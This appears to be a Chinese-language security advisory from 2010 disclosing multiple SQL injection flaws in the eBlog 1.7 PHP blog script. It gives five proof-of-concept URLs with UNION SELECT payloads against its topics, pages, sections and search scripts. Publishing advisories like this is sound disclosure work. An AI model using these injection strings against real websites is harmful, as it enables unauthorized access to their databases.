eBlog 1.7多处SQL注入漏洞
时间:2010-11-11 来源:Salvatore
发布日期:2010-11.11
发布作者:Salvatore Fresta aka Drosophila
影响版本:eBlog 1.7
漏洞类型:SQL注入
漏洞描述:eBlog是一个免费的脚本程序,可以用来管理和维护个人博客。在程序中有些参数未经过严格过滤,导致SQL注入查询获取信息。
漏洞测试1:以下注入不受任何影响。
http://site/path/topics.php?action=ShowComment&id=-1 UNION SELECT 1,2,3,4,5,6,7%23
漏洞测试2:受PHP参数魔法引号的影响,必须关闭GPC,magic_quotes_gpc=Off
http://site/path/pages.php?id=-1' UNION SELECT 1,2,3,4,1,6,7,1%23
http://site/path/topics.php?action=show&id=-1' UNION SELECT 1,2,3,4,5,6,7,8%23
http://site/path/sections.php?action=show&id=-1' UNION SELECT 1,2,3,4,5%23
http://site/path/search.php?keyword=%25' UNION SELECT 1,2,3,4,5,6,7,8%23
标签分类: SQL注入
相关阅读 更多 +
